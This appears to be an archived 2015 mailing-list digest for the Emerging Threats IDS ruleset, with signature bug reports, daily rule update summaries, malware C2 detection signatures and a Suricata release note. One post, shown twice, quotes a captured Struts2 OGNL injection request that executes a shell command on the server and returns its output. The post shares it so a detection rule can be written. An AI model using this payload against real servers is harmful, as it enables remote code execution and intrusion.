rmkml | 31 Jan 18:48 2015
Picon

wrong two distance on sid 2016527 rev 3

Hi,

Could you check if two distance are wrong on this sig please ?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN W32/Asprox php.dll.crp POST CnC
Beacon"; flow:established,to_server; 
content:"POST "; depth:5; pcre:"/\r\nHost\x3a[^\r\n\x3a]+?\x3a\d{1,5}\r\n/"; content:"|0d 0a 0d 
0a|id="; content:"&code="; fast_pattern; distance:0; distance:0; content:"&data="; distance:0;
pcre:"/^POST \x2F[a-f0-9]{40,60}\x20/i";

reference:url,www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf; 
classtype:trojan-activity; sid:2016527; rev:3;)

Discovered during http://etplc.org project update.

Regards
 <at> Rmkml
rmkml | 31 Jan 18:45 2015
Picon

flow not_established error on sid 2014385 rev 6

Hi,

Could you check if flow not_established on this sig is correct please ?

alert tcp $HOME_NET 3389 -> any any (msg:"ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit
Set"; flow:from_server,not_established; 
flags:SA; flowbits:isnotset,ms.rdp.synack; flowbits:set,ms.rdp.synack; flowbits:noalert;
reference:cve,2012-0152; classtype:not-suspicious; 
sid:2014385; rev:6;)

Discovered during http://etplc.org project update.

Regards
 <at> Rmkml
Francis Trudeau | 30 Jan 21:32 2015
Picon

Daily Ruleset Update Summary 2015/01/30

 [***] Summary: [***]

 9 new Open signatures, 22 new Pro (9 + 13).  Cirtoni/CTB, f0xy, MSIL/Agent.PYO.

 Thanks:  Pierre Schweitzer and  <at> kafeine.

 [+++]          Added rules:          [+++]

 Open:

  2020333 - ET TROJAN MSIL/Agent.PYO Retrieving Update (trojan.rules)
  2020334 - ET TROJAN MSIL/Agent.PYO Retrieving Config (trojan.rules)
  2020335 - ET TROJAN MSIL/Agent.PYO Receiving Config (trojan.rules)
  2020336 - ET TROJAN MSIL/Agent.PYO Possible net.tcp CnC Beacon
(stat) (trojan.rules)
  2020337 - ET TROJAN MSIL/Agent.PYO Possible net.tcp CnC Beacon
(control) (trojan.rules)
  2020338 - ET WEB_SERVER WPScan User Agent (web_server.rules)
  2020339 - ET TROJAN f0xy Checkin (trojan.rules)
  2020340 - ET TROJAN f0xy Checkin (trojan.rules)
  2020341 - ET TROJAN f0xy Download (trojan.rules)

 Pro:

  2809642 - ETPRO ATTACK_RESPONSE Mimikatz Binary Transfer via HTTP
(attack_response.rules)
  2809643 - ETPRO ATTACK_RESPONSE Mimikatz mimidrv.sys Filename in SMB
Traffic (Unicode) (attack_response.rules)
  2809644 - ETPRO ATTACK_RESPONSE Mimikatz mimikatz.exe Filename in
SMB Traffic (Unicode) (attack_response.rules)
(Continue reading)

Pierre Schweitzer | 30 Jan 10:23 2015

WPScan

Dear all,

I was wondering about the need to make an ET rules to detect a WPScan
usage against a possible WordPress installation. I made the test and so
far, it remains unseen, whereas it could be a potential scan prior to an
attack.

WPScan is using an UA such as: WPScan v2.6 (http://wpscan.org)
Also, it will try to open the readme.html (or readme.txt|TXT) of the WP
installation and will also do this for any theme installed (in
wp-content/themes/*/readme.txt|TXT).

It will also try to find a suitable wp-config.php file (looking for
old/backup as well), along with the xmlrpc.php file.

I can provide the complete trace upon request.

Cheers,
--

-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
Francis Trudeau | 29 Jan 23:14 2015
Picon

Daily Ruleset Update Summary 2015/01/29

 [***] Summary: [***]

 4 new Open, 22 new Pro signatures (4 + 18).  D-Link DSL-2740R vuln,
SiR-DoOoM, KJw0rm, Citroni/CTB Locker, Kakfum.

 Thanks:  Eoin Miller, Wbbigdave,  <at> rmkml,  <at> abuse_ch, and  <at> spookerlabs.

 [+++]          Added rules:          [+++]

 Open:

  2020329 - ET TROJAN Unknown Mailer CnC Beacon 2 (trojan.rules)
  2020330 - ET TROJAN Unknown Mailer CnC Beacon (trojan.rules)
  2020331 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020332 - ET CURRENT_EVENTS Possible PHISH Dropbox - Landing Page -
Title over non SSL (current_events.rules)

 Pro:

  2809624 - ETPRO EXPLOIT D-Link DSL-2740R Remote DNS Change Attempt
(exploit.rules)
  2809625 - ETPRO TROJAN VBS/Jenxcus.A Checkin (trojan.rules)
  2809626 - ETPRO TROJAN SiR-DoOoM worm User-Agent (trojan.rules)
  2809627 - ETPRO TROJAN KJw0rm User-Agent (trojan.rules)
  2809628 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon (trojan.rules)
  2809629 - ETPRO TROJAN KJw0rm CnC Beacon (trojan.rules)
  2809630 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon Response (trojan.rules)
  2809631 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809632 - ETPRO MOBILE_MALWARE Android Hideicon Download
(Continue reading)

Victor Julien | 29 Jan 18:41 2015
Picon

Suricata 2.1beta3 Available!

The OISF development team is proud to announce Suricata 2.1beta3. This
is the third beta release for the upcoming 2.1 version. It should be
considered a development snapshot for the 2.1 branch.

Get the new release here:
http://www.openinfosecfoundation.org/download/suricata-2.1beta3.tar.gz

New features

Feature #1309: Lua support for Stats output
Feature #1310: Modbus parsing and matching

Improvements

Optimization #1339: flow timeout optimization
Optimization #1371: mpm optimization
Feature #1317: Lua: Indicator for end of flow
Feature #1333: unix-socket: allow (easier) non-root usage
Feature #1261: Request for Additional Lua Capabilities

Bug fixes

Bug #977: WARNING on empty rules file is fatal (should not be)
Bug #1184: pfring: cppcheck warnings
Bug #1321: Flow memuse bookkeeping error
Bug #1327: pcre pkt/flowvar capture broken for non-relative matches (master)
Bug #1332: cppcheck: ioctl
Bug #1336: modbus: CID 1257762: Logically dead code (DEADCODE)
Bug #1351: output-json: duplicate logging (2.1.x)
Bug #1354: coredumps on quitting on OpenBSD
(Continue reading)

Francis Trudeau | 28 Jan 23:57 2015
Picon

Daily Ruleset Update Summary 2015/01/28

 [***] Summary: [***]

 9 new Open sigs, 32 new Pro (9 + 23).  Job314/Neutrino, CVE-2015-0235
Exim vuln, Wordpress PingBack GHOST.

 Thanks:Pierre Schweitzer, Kevin Ross,  <at> abuse_ch, and UT Austin
Information Security Office.

 [+++]          Added rules:          [+++]

 Open:

  2020320 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27
2015 (current_events.rules)
  2020321 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27
2015 (current_events.rules)
  2020322 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020323 - ET WEB_SERVER Heimdallbot Attack Tool Inbound (web_server.rules)
  2020324 - ET POLICY Onion2Web Tor Proxy Cookie (policy.rules)
  2020325 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2020326 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2020327 - ET WEB_SPECIFIC_APPS Wordpress PingBack Possbile GHOST
attempt (web_specific_apps.rules)
  2020328 - ET CURRENT_EVENTS Possible Dridex Campaign Download Jan 28
2014 (current_events.rules)

 Pro:
(Continue reading)

Kevin Ross | 28 Jan 16:14 2015

SIGS: ET TROJAN Symmi.22722 & ET POLICY Onion2Web Cookie

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Symmi.22722 CnC Beacon"; flow:established,to_server; content:"/index.php?email="; fast_pattern; http_uri; content:"&method="; http_uri; content:"&len"; http_uri; content:!"Referer|3A|"; http_header; content:!"User-Agent|3A|"; http_header; classtype:trojan-activity; reference:md5,062da1efea7bce620a2b925b53d818c5; sid:156611; rev;1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Onion2Web Cookie"; flow:established,to_server; content:"onion2web_confirmed="; http_cookie; fast_pattern:only; classtype:policy-violation; reference:md5,a46e609662eb94a726fcb4471b7057d4; reference:md5,2b62cdb6bcec4bff47eff437e4fc46d3; reference:url,github.com/starius/onion2web; sid:156612; rev;1;)


Kind Regards,
Kevin Ross
<div><div dir="ltr">
<div>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Symmi.22722 CnC Beacon"; flow:established,to_server; content:"/index.php?email="; fast_pattern; http_uri; content:"&amp;method="; http_uri; content:"&amp;len"; http_uri; content:!"Referer|3A|"; http_header; content:!"User-Agent|3A|"; http_header; classtype:trojan-activity; reference:md5,062da1efea7bce620a2b925b53d818c5; sid:156611; rev;1;)<br><br>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Onion2Web Cookie"; flow:established,to_server; content:"onion2web_confirmed="; http_cookie; fast_pattern:only; classtype:policy-violation; reference:md5,a46e609662eb94a726fcb4471b7057d4; reference:md5,2b62cdb6bcec4bff47eff437e4fc46d3; reference:url,<a href="http://github.com/starius/onion2web">github.com/starius/onion2web</a>; sid:156612; rev;1;) <br><br><br>
</div>Kind Regards,<br>Kevin Ross<br>
</div></div>
Pierre Schweitzer | 28 Jan 10:00 2015

Heimdallbot

Dear all,

We spotted yesterday totally non-legit traffic coming from an
Alibaba-Inc IP on our infrastructure. ET rules were capable of matching
most of its vulnerabilities exploitation attempts. But it seems that one
of the requests wasn't caught by ET.
I'm sharing it here, if it's possible to design a rule. It's obviously
definitely not legit. It was apparently targeting phpBB (for that
specific query).

/forum/memberlist.php?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d%40java.util.Collections%40EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27ifconfig%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d%40org.apache.struts2.ServletActionContext%40getResponse%2
8%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023%27heimdall181%27%29%27%29%28bla%29%29

I'm talking about heimdall here, because the UA for all the requests
was: Mozilla/5.0 compatible;Heimdallbot/3.0;+AlibabaGroup
And also not the println in the request.

If anyone has information, or wants more query that were made by that
bot, be welcome.

With my best regards,
-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.

Attachment (smime.p7s): application/pkcs7-signature, 5783 bytes
Dear all,

We spotted yesterday totally non-legit traffic coming from an
Alibaba-Inc IP on our infrastructure. ET rules were capable of matching
most of its vulnerabilities exploitation attempts. But it seems that one
of the requests wasn't caught by ET.
I'm sharing it here, if it's possible to design a rule. It's obviously
definitely not legit. It was apparently targeting phpBB (for that
specific query).

/forum/memberlist.php?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d%40java.util.Collections%40EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27ifconfig%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d%40org.apache.struts2.ServletActionContext%40getResponse%2
8%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023%27heimdall181%27%29%27%29%28bla%29%29

I'm talking about heimdall here, because the UA for all the requests
was: Mozilla/5.0 compatible;Heimdallbot/3.0;+AlibabaGroup
And also not the println in the request.

If anyone has information, or wants more query that were made by that
bot, be welcome.

With my best regards,
--

-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.

Francis Trudeau | 27 Jan 23:23 2015
Picon

Daily Ruleset Update Summary 2015/01/27

 [***] Summary: [***]

 2 new Open signatures, 11 new Pro (2 + 9).  FerretCMS SQLi, SmartCMS
SQLi, CVE-2015-0235 Exim buffer overflow.

 Thanks:   <at> rmkml

 [+++]          Added rules:          [+++]

 Open:

  2020315 - ET TROJAN KL-Remote / Cryp_Banker14 RAT connection (trojan.rules)
  2020316 - ET TROJAN KL-Remote / Cryp_Banker14 RAT response (trojan.rules)

 Pro:

  2809592 - ETPRO WEB_SPECIFIC_APPS FerretCMS SQLi Attempt
(web_specific_apps.rules)
  2809593 - ETPRO WEB_SPECIFIC_APPS SmartCMS SQLi Attempt
(web_specific_apps.rules)
  2809594 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a
Uploading Info via FTP (mobile_malware.rules)
  2809595 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a Checkin
(mobile_malware.rules)
  2809596 - ETPRO MOBILE_MALWARE Android.Riskware.SmsPay.EX Checkin
(mobile_malware.rules)
  2809597 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(EHLO) (exploit.rules)
  2809598 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2809599 - ETPRO TROJAN KazyBot Checkin (trojan.rules)
  2809600 - ETPRO MALWARE Win32/SoftPulse.P HTTP Request (malware.rules)

 [///]     Modified active rules:     [///]

  2014726 - ET POLICY Outdated Windows Flash Version IE (policy.rules)
  2014727 - ET POLICY Outdated Mac Flash Version (policy.rules)
  2020300 - ET CURRENT_EVENTS DRIVEBY Nuclear EK Exploit Struct Jan 23
2015 (current_events.rules)
  2808129 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.gl Checkin
(mobile_malware.rules)
Olude, GB A | 27 Jan 23:17 2015

ET CURRENT_EVENTS Possible Upatre SSL Cert ventureonsite.com

Hi Folks,

 

Looking at some traffic around this domain/signature. Can you please assist with additional detail on which Upatre campaign used this?

Any info on md5 or actual upatre sample would be immensely appreciated.

 

Thanks,

GB




NOTICE: Morgan Stanley is not acting as a municipal advisor and the opinions or views contained herein are not intended to be, and do not constitute, advice within the meaning of Section 975 of the Dodd-Frank Wall Street Reform and Consumer Protection Act. If you have received this communication in error, please destroy all electronic and paper copies; do not disclose, use or act upon the information; and notify the sender immediately. Mistransmission is not intended to waive confidentiality or privilege. Morgan Stanley reserves the right, to the extent permitted under applicable law, to monitor electronic communications. This message is subject to terms available at the following link: http://www.morganstanley.com/disclaimers If you cannot access these links, please notify us by reply message and we will send the contents to you. By messaging with Morgan Stanley you consent to the foregoing.

<div>
<p>
</p>
<div class="WordSection1">
<p class="MsoNormal"><span>Hi Folks,<p></p></span></p>
<p class="MsoNormal"><span><p>&nbsp;</p></span></p>
<p class="MsoNormal"><span>Looking at some traffic around this domain/signature. Can you please assist with additional detail on which Upatre campaign used this?<p></p></span></p>
<p class="MsoNormal"><span>Any info on md5 or actual upatre sample would be immensely appreciated.<p></p></span></p>
<p class="MsoNormal"><span><p>&nbsp;</p></span></p>
<p class="MsoNormal"><span>Thanks,<p></p></span></p>
<p class="MsoNormal"><span>GB<p></p></span></p>
</div>
<br><br><br><span>NOTICE: 
Morgan Stanley is not acting as a municipal advisor and the opinions or views 
contained herein are not intended to be, and do not constitute, advice within 
the meaning of Section 975 of the Dodd-Frank Wall Street Reform and Consumer 
Protection Act. If you have received this communication in error, please destroy 
all electronic and paper copies; do not disclose, use or act upon the 
information; and notify the sender immediately. Mistransmission is not intended 
to waive confidentiality or privilege. Morgan Stanley reserves the right, to the 
extent permitted under applicable law, to monitor electronic communications. 
This message is subject to terms available at the following link: <a href="http://www.morganstanley.com/disclaimers">http://www.morganstanley.com/disclaimers</a> 
If you cannot access these links, please notify us by reply message and we will 
send the contents to you. By messaging with Morgan Stanley you consent to the 
foregoing.</span><br><p></p>
<p></p>
<p></p>
</div>

Gmane